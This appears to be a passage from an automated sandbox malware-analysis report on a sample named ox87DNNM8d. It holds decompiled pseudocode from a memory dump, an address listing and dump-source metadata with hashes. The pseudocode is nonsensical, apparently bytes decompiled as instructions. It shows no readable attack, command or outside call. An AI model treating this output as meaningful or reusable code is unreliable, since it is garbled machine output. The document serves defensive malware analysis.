                                            											_t1388 = es;
                                            											_pop(ds);
                                            											asm("sbb al, 0x73");
                                            											 *_t1307 =  *_t1307 + _t1160;
                                            											asm("outsd");
                                            											asm("outsd");
                                            											if(_t722 == 0x20a0000) {
                                            												 *_t1388 =  *_t1388 + _t722;
                                            											}
                                            											_push(es);
                                            											asm("sbb al, 0x6f");
                                            										}
                                            										 *[ds:eax] =  *[ds:eax] + _t722;
                                            										_t723 = _t722 |  *_t1307;
                                            										asm("outsd");
                                            										if(_t723 == 0) {
                                            											 *_t1388 =  *_t1388 + _t723;
                                            										}
                                            										_push(es);
                                            										_t724 = _t723 & _t1093;
                                            										asm("adc [esi+0x1b5282a], edx");
                                            										 *_t1388 =  *_t1388 + _t724;
                                            										asm("outsd");
                                            										_t725 = _t724 + 1;
                                            										 *_t725 =  *_t725 + _t725;
                                            										_t726 = _t725 |  *_t1307;
                                            										asm("outsd");
                                            										if(_t726 == 0) {
                                            											 *_t1388 =  *_t1388 + _t726;
                                            										}
                                            										ss = es;
                                            										asm("outsd");
                                            										_t1161 = _t1160 + 1;
                                            										 *_t726 =  *_t726 + _t726;
                                            										_t727 = _t726 |  *_t1307;
                                            										asm("outsd");
                                            										if(_t727 == 0) {
                                            											 *_t1388 =  *_t1388 + _t727;
                                            										}
                                            										_push(es);
                                            										_push(ss);
                                            										asm("outsd");
                                            										_push(_t1397);
                                            										 *_t727 =  *_t727 + _t727;
                                            										_t732 = ((_t727 |  *_t1307) &  *(_t727 |  *_t1307)) + ((_t727 |  *_t1307) &  *(_t727 |  *_t1307)) + 0x00000001 &  *(((_t727 |  *_t1307) &  *(_t727 |  *_t1307)) + ((_t727 |  *_t1307) &  *(_t727 |  *_t1307)) + 1);
                                            										_t125 = _t732 + 0x41;
                                            										 *_t125 =  *((intOrPtr*)(_t732 + 0x41)) + _t1307;
                                            										if( *_t125 >= 0) {
                                            											L100:
                                            											asm("outsd");
                                            											if(_t1516 != 0) {
                                            												 *_t1388 =  *_t1388 + _t732;
                                            											}
                                            											_push(es);
                                            											asm("outsd");
                                            											_t733 = _t732 - 1;
                                            											 *_t733 =  *_t733 + _t733;
                                            											_t734 = _t733 |  *_t1307;
                                            											 *_t1368 =  *_t1368 - _t734;
                                            											 *_t1307 =  *_t1307 + _t1161;
                                            											_t1162 = _t1161 + _t1368[0x1c];
                                            											 *_t734 =  *_t734 + _t734;
                                            											asm("outsd");
                                            											_t735 = _t734 - 1;
                                            											 *_t735 =  *_t735 + _t735;
                                            											_t736 = _t735 |  *_t1307;
                                            											asm("sbb [eax], ebp");
                                            											_t1368 = es;
                                            											 *_t736 =  *_t736 + _t736;
                                            											_t737 = _t736 |  *_t1307;
                                            											_push(ss);
                                            											 *_t737 =  *_t737 - _t737;
                                            											 *_t1307 =  *_t1307 + _t1162;
                                            											_t1307 = _t1307 +  *_t1388;
                                            											 *_t1162 =  *_t1162 - _t737;
                                            											 *_t1307 =  *_t1307 + _t1162;
                                            										} else {
                                            											 *_t732 =  *_t732 + _t732;
                                            											_t1162 = _t1161 |  *_t732;
                                            											_pop(_t1407);
                                            											 *_t732 =  *_t732 + _t732;
                                            											_pop(ss);
                                            											 *_t1397 =  *_t1397 - _t1093;
                                            											 *_t1307 =  *_t1307 + _t1162;
                                            											_t737 = (_t732 |  *_t1307) +  *(_t732 |  *_t1307);
                                            											 *_t737 =  *_t737 + _t737;
                                            											 *_t1368 =  *_t1368 + _t1093;
                                            											if( *_t1368 != 0) {
                                            												 *_t1307 =  *_t1307 + _t1162;
                                            												 *_t1388 =  *_t1388 - _t1093;
                                            												 *_t1307 =  *_t1307 + _t1162;
                                            												_t1281 = _t1162 +  *_t737;
                                            												_t1368 =  &(_t1368[0]);
                                            												 *_t737 =  *_t737 + _t737;
                                            												_t1073 = _t737 |  *_t1307;
                                            												asm("outsd");
                                            												if(_t1073 == 0) {
                                            													 *_t1388 =  *_t1388 + _t1073;
                                            												}
                                            												_push(es);
                                            												asm("outsd");
                                            												_t1074 = _t1073 - 1;
                                            												 *_t1074 =  *_t1074 + _t1074;
                                            												_t1075 = _t1074 |  *_t1307;
                                            												 *_t1368 =  *_t1368 - _t1075;
                                            												 *_t1307 =  *_t1307 + _t1281;
                                            												_t1282 = _t1281 + _t1368[0x1e];
                                            												 *_t1075 =  *_t1075 + _t1075;
                                            												_push(es);
                                            												asm("outsd");
                                            												_t1076 = _t1075 - 1;
                                            												 *_t1076 =  *_t1076 + _t1076;
                                            												_t1077 = _t1076 |  *_t1307;
                                            												 *_t1368 =  *_t1368 - _t1077;
                                            												 *_t1307 =  *_t1307 + _t1282;
                                            												_t1283 = _t1282 + _t1368[0x1d];
                                            												 *_t1077 =  *_t1077 + _t1077;
                                            												_push(es);
                                            												asm("outsd");
                                            												_t1078 = _t1077 - 1;
                                            												 *_t1078 =  *_t1078 + _t1078;
                                            												_t732 = _t1078 |  *_t1307;
                                            												 *_t1368 =  *_t1368 - _t732;
                                            												 *_t1307 =  *_t1307 + _t1283;
                                            												_t1161 = _t1283 + _t1368[0x1d];
                                            												_t1516 = _t1161;
                                            												goto L100;
                                            											}
                                            										}
                                            										_t738 = _t737 +  *_t737;
                                            										asm("out dx, al");
                                            										asm("adc [esi+0x1b5282a], edx");
                                            										 *_t1388 =  *_t1388 + _t738;
                                            										 *_t1093 =  *_t1093 - _t1093;
                                            										 *_t738 =  *_t738 + _t738;
                                            										_t739 = _t738 |  *_t1307;
                                            										_push(ss);
                                            										 *_t1307 =  *_t1307 - _t739;
                                            										 *_t1307 =  *_t1307 + _t1162;
                                            										_t1308 = _t1307 +  *_t1388;
                                            										 *_t1093 =  *_t1093 - _t739;
                                            										 *_t1308 =  *_t1308 + _t1162;
                                            										_t1309 = _t1308 +  *_t1368;
                                            										 *((intOrPtr*)(_t739 + _t739)) =  *((intOrPtr*)(_t739 + _t739)) - _t739;
                                            										_t741 = (_t739 |  *_t1309) & _t1309;
                                            										asm("adc [esi+0x1b5282a], edx");
                                            										 *_t1388 =  *_t1388 + _t741;
                                            										asm("outsd");
                                            										 *[gs:eax] =  *[gs:eax] + _t741;
                                            										_t742 = _t741 |  *_t1309;
                                            										asm("outsd");
                                            										if(_t742 >= 0) {
                                            											 *_t1388 =  *_t1388 + _t742;
                                            										}
                                            										_push(es);
                                            										asm("outsd");
                                            										asm("o16 add [eax], al");
                                            										_t743 = _t742 |  *_t1309;
                                            										_push(ss);
                                            										 *_t1368 =  *_t1368 - _t743;
                                            										 *_t1309 =  *_t1309 + _t1162;
                                            										_t1163 = _t1162 +  *_t743;
                                            										_push(0x2a0a0000);
                                            										while(1) {
                                            											L106:
                                            											_t1095 = _t1093 -  *_t1388 +  *((intOrPtr*)(_t1093 -  *_t1388 - 0x7c));
                                            											 *_t743 =  *_t743 + _t743;
                                            											_t745 = _t743 + 0x0000002a &  *_t1309;
                                            											 *_t745 =  *_t745 + _t745;
                                            											_t746 = _t745 + 0x2a;
                                            											 *_t746 =  *_t746 + _t746;
                                            											 *_t1388 =  *_t1388 + _t1095;
                                            											_t1096 = _t1095 +  *((intOrPtr*)(_t1095 - 0x7b));
                                            											 *_t746 =  *_t746 + _t746;
                                            											_t748 = _t746 + 0x0000002a &  *_t1309;
                                            											 *_t748 =  *_t748 + _t748;
                                            											_t749 = _t748 + 0x2a;
                                            											 *_t749 =  *_t749 + _t749;
                                            											 *_t1388 =  *_t1388 + _t1096;
                                            											_t1097 = _t1096 +  *((intOrPtr*)(_t1096 - 0x7a));
                                            											 *_t749 =  *_t749 + _t749;
                                            											_t751 = _t749 + 0x0000002a &  *_t1309;
                                            											_t1371 = _t1368 +  *((intOrPtr*)(_t1397 - 0x7c)) +  *((intOrPtr*)(_t1397 - 0x7b)) +  *((intOrPtr*)(_t1397 - 0x7a));
                                            											 *_t751 =  *_t751 + _t751;
                                            											_t752 = _t751 + 0x2a;
                                            											 *_t752 =  *_t752 + _t752;
                                            											 *_t1388 =  *_t1388 + _t1097;
                                            											_t1098 = _t1097 +  *((intOrPtr*)(_t1097 - 0x79));
                                            											 *_t752 =  *_t752 + _t752;
                                            											_t753 = _t752 + 0x2a;
                                            											asm("adc esi, [eax]");
                                            											while(1) {
                                            												_t754 = _t753 +  *_t753;
                                            												asm("aaa");
                                            												 *_t754 =  *_t754 + _t754;
                                            												 *_t1388 =  *_t1388 + _t754;
                                            												while(1) {
                                            													L108:
                                            													_push(es);
                                            													 *_t754 =  *_t754 + _t754;
                                            													asm("adc [edx], eax");
                                            													 *_t1388 =  *_t1388 + 1;
                                            													if( *_t1388 > 0) {
                                            														 *_t1388 =  *_t1388 + _t754;
                                            														_t1524 =  *_t1388;
                                            													}
                                            													_push(es);
                                            													if(_t1524 >= 0) {
                                            														break;
                                            													}
                                            													 *_t754 =  *_t754 + _t754;
                                            													_t1163 = _t1163 |  *_t1309;
                                            													_t1093 = _t1098 +  *((intOrPtr*)(_t1098 - 0x79));
                                            													 *_t754 =  *_t754 + _t754;
                                            													_pop(es);
                                            													_t1065 = _t754 + 0xb - 7;
                                            													_pop(es);
                                            													_push(es);
                                            													asm("outsd");
                                            													asm("insb");
                                            													 *_t1065 =  *_t1065 + _t1065;
                                            													_t1066 = _t1065 |  *_t1309;
                                            													_t1368 = _t1371 +  *((intOrPtr*)(_t1397 - 0x79));
                                            													 *_t1066 =  *_t1066 + _t1066;
                                            													_t743 = _t1066 + 2;
                                            													if(_t743 != 0) {
                                            														goto L106;
                                            													} else {
                                            														 *_t743 =  *_t743 + _t743;
                                            														_pop(es);
                                            														_t1068 = _t743 + 0xb - 7;
                                            														_pop(es);
                                            														_push(es);
                                            														asm("outsd");
                                            														asm("insd");
                                            														 *_t1068 =  *_t1068 + _t1068;
                                            														_t1163 = _t1163 |  *_t1309;
                                            														 *_t1388 =  *_t1388 + _t1093;
                                            														_t1098 = _t1093 +  *((intOrPtr*)(_t1093 - 0x78));
                                            														 *_t1068 =  *_t1068 + _t1068;
                                            														asm("adc esi, [eax]");
                                            														_t756 = _t1068 + 0x2a +  *((intOrPtr*)(_t1068 + 0x2a));
                                            														asm("aaa");
                                            														 *_t756 =  *_t756 + _t756;
                                            														 *0x2110000 =  *0x2110000 + _t756;
                                            														 *_t1388 =  *_t1388 + 1;
                                            														 *_t1163 =  *_t1163;
                                            														_push(es);
                                            														if( *_t1163 < 0) {
                                            															 *_t756 =  *_t756 + _t756;
                                            															_t1163 = _t1163 |  *_t1309;
                                            															_t1098 = _t1098 +  *((intOrPtr*)(_t1098 - 0x78));
                                            															 *_t756 =  *_t756 + _t756;
                                            															_pop(es);
                                            															_pop(es);
                                            															_push(es);
                                            															asm("outsd");
                                            															_t753 =  *(_t756 + 0xb - 7) * 0x3020a00;
                                            															if(_t753 >= 0) {
                                            																_t754 = _t753 +  *_t753;
                                            																asm("aaa");
                                            																 *_t754 =  *_t754 + _t754;
                                            																 *_t1388 =  *_t1388 + _t754;
                                            																continue;
                                            															} else {
                                            																 *_t753 =  *_t753 + _t753;
                                            																_t754 = _t753 + 2;
                                            																if(_t754 != 0) {
                                            																	continue;
                                            																} else {
                                            																	break;
                                            																}
                                            															}
                                            														}
                                            													}
                                            													L116:
                                            													_pop(es);
                                            													_push(es);
                                            													asm("outsd");
                                            													_push(0);
                                            													 *_t1309 =  *_t1309 + _t1163;
                                            													_t757 = _t756 -  *_t756;
                                            													_push(ds);
                                            													_t1164 = _t1163 +  *_t757;
                                            													if(_t1164 < 0) {
                                            														 *_t1388 =  *_t1388 + _t757;
                                            													}
                                            													_push(es);
                                            													_t758 = _t757 -  *_t1098;
                                            													 *_t758 =  *_t758 ^ _t1164;
                                            													 *_t1098 =  *_t1098 + _t758;
                                            													 *_t758 = _t758 +  *_t758;
                                            													 *_t758 = _t758 +  *_t758;
                                            													 *_t758 = _t758 +  *_t758;
                                            													 *_t758 = _t758 +  *_t758;
                                            													_push(es);
                                            													_t758[4] = _t758[4] & _t1164 +  *((intOrPtr*)(_t1371 + 0x74));
                                            													_t759 = _t1388;
                                            													_t1389 = _t758;
                                            													 *_t1389 =  *_t1389 + _t759;
                                            													asm("outsd");
                                            													asm("aas");
                                            													 *_t759 =  *_t759 + _t759;
                                            													_t760 = _t759 |  *_t1309;
                                            													asm("outsd");
                                            													if(_t760 > 0) {
                                            														 *_t1389 =  *_t1389 + _t760;
                                            													}
                                            													ss = es;
                                            													asm("outsd");
                                            													_push(_t1397);
                                            													 *_t760 =  *_t760 + _t760;
                                            													_t761 = _t760 |  *_t1309;
                                            													asm("outsd");
                                            													if(_t761 == 0) {
                                            														 *_t1389 =  *_t1389 + _t761;
                                            													}
                                            													_push(es);
                                            													_push(ss);
                                            													asm("outsd");
                                            													_push(_t1397);
                                            													 *_t761 =  *_t761 + _t761;
                                            													_t762 = _t761 |  *_t1309;
                                            													asm("outsd");
                                            													if(_t762 >= 0) {
                                            														 *_t1389 =  *_t1389 + _t762;
                                            													}
                                            													_push(es);
                                            													 *(1 + _t1309 - 0x4ad7d56a) =  *(1 + _t1309 - 0x4ad7d56a) & _t1098;
                                            													 *_t762 =  *_t762 + _t762;
                                            													_push(es);
                                            													asm("outsd");
                                            													if ( *_t762 < 0) goto L125;
                                            													 *_t1309 =  *_t1309 + 1;
                                            													_t763 = _t762 -  *_t762;
                                            													_t1539 = _t763;
                                            													if(_t1539 > 0) {
                                            														asm("outsd");
                                            														if (_t1539 < 0) goto L129;
                                            													}
                                            													 *_t763 =  *_t763 + _t763;
                                            												}
                                            												 *_t754 =  *_t754 + _t754;
                                            												_pop(es);
                                            												_t756 = _t754 + 0xb - 7;
                                            												goto L116;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L5;
                                            					}
                                            				}
                                            			}

                                            0x00b58c22
                                            0x00b58c23
                                            0x00b58c25
                                            0x00b58c26
                                            0x00b58c61
                                            0x00b58c61
                                            0x00b58c62
                                            0x00b58c65
                                            0x00b58c67
                                            0x00b58c69
                                            0x00b58c6a
                                            0x00b58c6c
                                            0x00b58c6c
                                            0x00b58c6d
                                            0x00b58c6e
                                            0x00b58c71
                                            0x00b58c73
                                            0x00b58c75
                                            0x00b58c76
                                            0x00b58c78
                                            0x00b58c78
                                            0x00b58c78
                                            0x00b58c7a
                                            0x00b58c7b
                                            0x00b58c7d
                                            0x00b58c7e
                                            0x00b58c80
                                            0x00b58c82
                                            0x00b58c85
                                            0x00b58c87
                                            0x00b58c89
                                            0x00b58c8a
                                            0x00b58c8c
                                            0x00b58c8c
                                            0x00b58c8e
                                            0x00b58c8f
                                            0x00000000
                                            0x00b58c8f
                                            0x00b58c28
                                            0x00b58c28
                                            0x00b58c2a
                                            0x00b58c2d
                                            0x00b58c2f
                                            0x00b58c31
                                            0x00b58c32
                                            0x00b58c34
                                            0x00b58c34
                                            0x00b58c35
                                            0x00b58c36
                                            0x00b58c38
                                            0x00b58c3e
                                            0x00b58c40
                                            0x00b58c43
                                            0x00b58c45
                                            0x00b58c48
                                            0x00b58c4b
                                            0x00b58c4d
                                            0x00b58c4f
                                            0x00b58c51
                                            0x00b58c52
                                            0x00b58c90
                                            0x00b58c90
                                            0x00b58c91
                                            0x00b58c95
                                            0x00b58c97
                                            0x00b58c98
                                            0x00b58c99
                                            0x00b58c9b
                                            0x00b58c9d
                                            0x00b58c9e
                                            0x00b58ca0
                                            0x00b58ca0
                                            0x00b58ca1
                                            0x00b58ca2
                                            0x00b58ca4
                                            0x00b58ca9
                                            0x00b58cab
                                            0x00b58cac
                                            0x00b58caf
                                            0x00b58cb1
                                            0x00b58cb4
                                            0x00b58cb7
                                            0x00b58cb8
                                            0x00b58c54
                                            0x00b58c54
                                            0x00b58c56
                                            0x00b58c59
                                            0x00b58c5b
                                            0x00b58c5d
                                            0x00b58c5e
                                            0x00b58c60
                                            0x00b58c60
                                            0x00000000
                                            0x00b58c5e
                                            0x00b58c52
                                            0x00b58cb9
                                            0x00b58cba
                                            0x00b58cbc
                                            0x00b58cbe
                                            0x00b58cbf
                                            0x00b58cc1
                                            0x00b58cc1
                                            0x00b58cc3
                                            0x00b58cc4
                                            0x00b58cc6
                                            0x00b58cca
                                            0x00b58ccc
                                            0x00b58cd2
                                            0x00b58cd3
                                            0x00b58cd5
                                            0x00b58cd5
                                            0x00b58cd6
                                            0x00b58cd7
                                            0x00b58cda
                                            0x00b58cdc
                                            0x00b58cde
                                            0x00b58cdf
                                            0x00b58ce1
                                            0x00b58ce1
                                            0x00b58ce2
                                            0x00b58ce3
                                            0x00b58ce4
                                            0x00b58ce5
                                            0x00b58ce6
                                            0x00b58ce8
                                            0x00b58cea
                                            0x00b58ceb
                                            0x00b58ced
                                            0x00b58ced
                                            0x00b58cee
                                            0x00b58cef
                                            0x00b58cf1
                                            0x00b58cf3
                                            0x00b58cf5
                                            0x00b58cf6
                                            0x00b58cf8
                                            0x00b58cfa
                                            0x00b58cfd
                                            0x00b58cff
                                            0x00b58d01
                                            0x00b58d02
                                            0x00b58d04
                                            0x00b58d04
                                            0x00b58d06
                                            0x00b58d08
                                            0x00b58d0e
                                            0x00b58d10
                                            0x00b58d13
                                            0x00b58d15
                                            0x00b58d18
                                            0x00b58d1b
                                            0x00b58d1c
                                            0x00b58d1d
                                            0x00b58d1e
                                            0x00b58d22
                                            0x00b58d24
                                            0x00b58d2a
                                            0x00b58d2b
                                            0x00b58d2d
                                            0x00b58d2d
                                            0x00b58d2e
                                            0x00b58d2f
                                            0x00b58d2f
                                            0x00b58d31
                                            0x00b58d34
                                            0x00b58d36
                                            0x00b58d37
                                            0x00b58d39
                                            0x00b58d39
                                            0x00b58d3a
                                            0x00b58d3b
                                            0x00b58d3d
                                            0x00b58d43
                                            0x00b58d45
                                            0x00b58d46
                                            0x00b58d47
                                            0x00b58d49
                                            0x00b58d4b
                                            0x00b58d4c
                                            0x00b58d4e
                                            0x00b58d4e
                                            0x00b58d50
                                            0x00b58d51
                                            0x00b58d52
                                            0x00b58d53
                                            0x00b58d55
                                            0x00b58d57
                                            0x00b58d58
                                            0x00b58d5a
                                            0x00b58d5a
                                            0x00b58d5b
                                            0x00b58d5c
                                            0x00b58d5d
                                            0x00b58d5e
                                            0x00b58d5f
                                            0x00b58d68
                                            0x00b58d6a
                                            0x00b58d6a
                                            0x00b58d6d
                                            0x00b58dca
                                            0x00b58dca
                                            0x00b58dcb
                                            0x00b58dcd
                                            0x00b58dcd
                                            0x00b58dce
                                            0x00b58dcf
                                            0x00b58dd0
                                            0x00b58dd1
                                            0x00b58dd3
                                            0x00b58dd5
                                            0x00b58dd8
                                            0x00b58dda
                                            0x00b58ddd
                                            0x00b58de0
                                            0x00b58de1
                                            0x00b58de2
                                            0x00b58de4
                                            0x00b58de6
                                            0x00b58de8
                                            0x00b58de9
                                            0x00b58deb
                                            0x00b58ded
                                            0x00b58dee
                                            0x00b58df1
                                            0x00b58df3
                                            0x00b58df5
                                            0x00b58df8
                                            0x00b58d6f
                                            0x00b58d6f
                                            0x00b58d71
                                            0x00b58d73
                                            0x00b58d74
                                            0x00b58d78
                                            0x00b58d79
                                            0x00b58d7c
                                            0x00b58d7e
                                            0x00b58d80
                                            0x00b58d83
                                            0x00b58d85
                                            0x00b58d89
                                            0x00b58d8b
                                            0x00b58d8e
                                            0x00b58d90
                                            0x00b58d92
                                            0x00b58d93
                                            0x00b58d95
                                            0x00b58d97
                                            0x00b58d98
                                            0x00b58d9a
                                            0x00b58d9a
                                            0x00b58d9b
                                            0x00b58d9c
                                            0x00b58d9d
                                            0x00b58d9e
                                            0x00b58da0
                                            0x00b58da2
                                            0x00b58da5
                                            0x00b58da7
                                            0x00b58daa
                                            0x00b58dac
                                            0x00b58dad
                                            0x00b58dae
                                            0x00b58daf
                                            0x00b58db1
                                            0x00b58db3
                                            0x00b58db6
                                            0x00b58db8
                                            0x00b58dbb
                                            0x00b58dbd
                                            0x00b58dbe
                                            0x00b58dbf
                                            0x00b58dc0
                                            0x00b58dc2
                                            0x00b58dc4
                                            0x00b58dc7
                                            0x00b58dc9
                                            0x00b58dc9
                                            0x00000000
                                            0x00b58dc9
                                            0x00b58d85
                                            0x00b58dfa
                                            0x00b58dfc
                                            0x00b58dfd
                                            0x00b58e03
                                            0x00b58e05
                                            0x00b58e07
                                            0x00b58e09
                                            0x00b58e0b
                                            0x00b58e0c
                                            0x00b58e0f
                                            0x00b58e11
                                            0x00b58e13
                                            0x00b58e16
                                            0x00b58e18
                                            0x00b58e1a
                                            0x00b58e20
                                            0x00b58e22
                                            0x00b58e28
                                            0x00b58e2a
                                            0x00b58e2b
                                            0x00b58e2e
                                            0x00b58e30
                                            0x00b58e31
                                            0x00b58e33
                                            0x00b58e33
                                            0x00b58e34
                                            0x00b58e35
                                            0x00b58e36
                                            0x00b58e39
                                            0x00b58e3b
                                            0x00b58e3c
                                            0x00b58e3f
                                            0x00b58e41
                                            0x00b58e43
                                            0x00b58e47
                                            0x00b58e47
                                            0x00b58e49
                                            0x00b58e4c
                                            0x00b58e50
                                            0x00b58e55
                                            0x00b58e57
                                            0x00b58e59
                                            0x00b58e5b
                                            0x00b58e5d
                                            0x00b58e60
                                            0x00b58e64
                                            0x00b58e69
                                            0x00b58e6b
                                            0x00b58e6d
                                            0x00b58e6f
                                            0x00b58e71
                                            0x00b58e74
                                            0x00b58e78
                                            0x00b58e7a
                                            0x00b58e7d
                                            0x00b58e7f
                                            0x00b58e81
                                            0x00b58e83
                                            0x00b58e85
                                            0x00b58e88
                                            0x00b58e8a
                                            0x00b58e8c
                                            0x00b58e8e
                                            0x00b58e8e
                                            0x00b58e90
                                            0x00b58e91
                                            0x00b58e93
                                            0x00b58e94
                                            0x00b58e94
                                            0x00b58e94
                                            0x00b58e95
                                            0x00b58e97
                                            0x00b58e99
                                            0x00b58e9b
                                            0x00b58e9d
                                            0x00b58e9d
                                            0x00b58e9d
                                            0x00b58e9e
                                            0x00b58e9f
                                            0x00000000
                                            0x00000000
                                            0x00b58ea1
                                            0x00b58ea3
                                            0x00b58ea5
                                            0x00b58ea8
                                            0x00b58eac
                                            0x00b58ead
                                            0x00b58eaf
                                            0x00b58eb0
                                            0x00b58eb1
                                            0x00b58eb2
                                            0x00b58eb3
                                            0x00b58eb5
                                            0x00b58eb7
                                            0x00b58eba
                                            0x00b58ebc
                                            0x00b58ebe
                                            0x00000000
                                            0x00b58ec0
                                            0x00b58ec0
                                            0x00b58ec4
                                            0x00b58ec5
                                            0x00b58ec7
                                            0x00b58ec8
                                            0x00b58ec9
                                            0x00b58eca
                                            0x00b58ecb
                                            0x00b58ecd
                                            0x00b58ecf
                                            0x00b58ed1
                                            0x00b58ed4
                                            0x00b58ed8
                                            0x00b58eda
                                            0x00b58edc
                                            0x00b58edd
                                            0x00b58edf
                                            0x00b58ee5
                                            0x00b58ee7
                                            0x00b58eea
                                            0x00b58eeb
                                            0x00b58eed
                                            0x00b58eef
                                            0x00b58ef1
                                            0x00b58ef4
                                            0x00b58ef8
                                            0x00b58efb
                                            0x00b58efc
                                            0x00b58efd
                                            0x00b58efe
                                            0x00b58f04
                                            0x00b58e8e
                                            0x00b58e90
                                            0x00b58e91
                                            0x00b58e93
                                            0x00000000
                                            0x00b58f06
                                            0x00b58f06
                                            0x00b58f08
                                            0x00b58f0a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00b58f0a
                                            0x00b58f04
                                            0x00b58eeb
                                            0x00b58f13
                                            0x00b58f13
                                            0x00b58f14
                                            0x00b58f15
                                            0x00b58f16
                                            0x00b58f18
                                            0x00b58f1a
                                            0x00b58f1c
                                            0x00b58f1d
                                            0x00b58f1f
                                            0x00b58f21
                                            0x00b58f21
                                            0x00b58f22
                                            0x00b58f23
                                            0x00b58f25
                                            0x00b58f27
                                            0x00b58f2a
                                            0x00b58f2c
                                            0x00b58f2e
                                            0x00b58f33
                                            0x00b58f35
                                            0x00b58f36
                                            0x00b58f39
                                            0x00b58f39
                                            0x00b58f3e
                                            0x00b58f40
                                            0x00b58f41
                                            0x00b58f42
                                            0x00b58f44
                                            0x00b58f46
                                            0x00b58f47
                                            0x00b58f49
                                            0x00b58f49
                                            0x00b58f4b
                                            0x00b58f4c
                                            0x00b58f4d
                                            0x00b58f4e
                                            0x00b58f50
                                            0x00b58f52
                                            0x00b58f53
                                            0x00b58f55
                                            0x00b58f55
                                            0x00b58f56
                                            0x00b58f57
                                            0x00b58f58
                                            0x00b58f59
                                            0x00b58f5a
                                            0x00b58f5c
                                            0x00b58f5e
                                            0x00b58f5f
                                            0x00b58f61
                                            0x00b58f61
                                            0x00b58f62
                                            0x00b58f63
                                            0x00b58f6a
                                            0x00b58f6c
                                            0x00b58f6d
                                            0x00b58f6e
                                            0x00b58f70
                                            0x00b58f72
                                            0x00b58f72
                                            0x00b58f74
                                            0x00b58f76
                                            0x00b58f77
                                            0x00b58f77
                                            0x00b58f78
                                            0x00b58f78
                                            0x00b58f0c
                                            0x00b58f10
                                            0x00b58f11
                                            0x00000000
                                            0x00b58f11
                                            0x00b58e8e
                                            0x00b58e47
                                            0x00b5893d
                                            0x00b58907
                                            0x00b588b3
                                            0x00000000
                                            0x00b58871
                                            0x00b587d0

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233109225.0000000000B52000.00000002.00020000.sdmp, Offset: 00B50000, based on PE: true
                                            • Associated: 00000001.00000002.233091224.0000000000B50000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.233268341.0000000000C08000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b50000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9bb4f8bbcafe8f3e6ec1647408d9d3be4789e3ae56bd3e0b4fc02c83457074d0
                                            • Instruction ID: afba0ea93bb9b994b612dd25c24899faa34ec17d71d95bb75daf40be0c51c60b
                                            • Opcode Fuzzy Hash: 9bb4f8bbcafe8f3e6ec1647408d9d3be4789e3ae56bd3e0b4fc02c83457074d0
                                            • Instruction Fuzzy Hash: 6343696240E7C29FC7038B745DB52E1BFB1AE5721471E49CBC4C18F0A3E6191A9ADB72
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233109225.0000000000B52000.00000002.00020000.sdmp, Offset: 00B50000, based on PE: true
                                            • Associated: 00000001.00000002.233091224.0000000000B50000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.233268341.0000000000C08000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b50000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

